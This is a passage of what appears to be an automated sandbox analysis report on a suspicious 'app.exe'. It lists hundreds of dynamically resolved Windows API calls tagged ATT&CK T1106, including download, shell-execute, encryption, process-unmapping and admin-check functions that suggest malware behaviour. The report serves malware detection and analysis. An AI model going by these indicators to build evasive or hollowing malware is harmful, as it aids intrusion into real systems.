URLDownloadToFileW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter ObtainUserAgentString (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter ShellExecuteW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CryptEncrypt (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CryptDecrypt (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CryptExportKey (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CryptGenKey (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter RpcServerRegisterIf (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter RpcServerRegisterIf2 (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter RpcServerUseProtseqEpW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter gethostname (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter OfflineFilesQueryStatus (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter CoWaitForMultipleHandles (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter ReleaseStgMedium (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter CoGetMalloc (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter HeapSetInformation (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter GrooveChainGetGlobalInterfacePtrAddress (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter GrooveChainCoCreateInstance (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter NetShareEnum (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter CscNetApiGetInterface (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter SLGetWindowsInformationDWORD (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter ProcessIdToSessionId (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter ImmCreateContext (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter ImmDestroyContext (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter FindFirstStreamW (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter FindNextStreamW (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter PnpIsFilePnpDriver (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter DevRtlGetThreadLogToken (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter NetApiBufferFree (UID: 00000000-00004636)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetProcessDpiAwareness (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter NtUnmapViewOfSection (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GlobalMemoryStatusEx (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetComputerNameExW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter IsUserAnAdmin (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetProcessDEPPolicy (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter EnumDisplayDevicesW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetSystemTimes (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetConsoleWindow (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter NtSuspendProcess (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter NtResumeProcess (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetExtendedTcpTable (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetExtendedUdpTable (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter OfflineFilesQueryStatus (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CoWaitForMultipleHandles (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter ReleaseStgMedium (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CoGetMalloc (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter HeapSetInformation (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GrooveChainGetGlobalInterfacePtrAddress (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter GrooveChainCoCreateInstance (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00003064)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetProcessDpiAwareness (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter NtUnmapViewOfSection (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter GlobalMemoryStatusEx (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetComputerNameExW (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter IsUserAnAdmin (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetProcessDEPPolicy (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter EnumDisplayDevicesW (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoW (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetSystemTimes (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetConsoleWindow (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter NtSuspendProcess (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter NtResumeProcess (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetExtendedTcpTable (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetExtendedUdpTable (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter OfflineFilesQueryStatus (UID: 00000000-00004980)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004696)\n \"app.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004696)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e00844b246c@Iphlpapi.DLL\"\n \"0f001000dc4b246c@Iphlpapi.DLL\"\n \"0c000d00244c246c@Iphlpapi.DLL\"\n \"140015006c4c246c@Iphlpapi.DLL\"\n \"0c000d00e04c246c@Iphlpapi.DLL\"\n \"15001600c03e246c@ADVAPI32.dll\"\n \"0e000f00703f246c@ADVAPI32.dll\"\n \"0e000f00cc3f246c@ADVAPI32.dll\"\n \"11001200b447246c@ADVAPI32.dll\"\n \"110012004848246c@ADVAPI32.dll\"\n \"120013008c48246c@ADVAPI32.dll\"\n 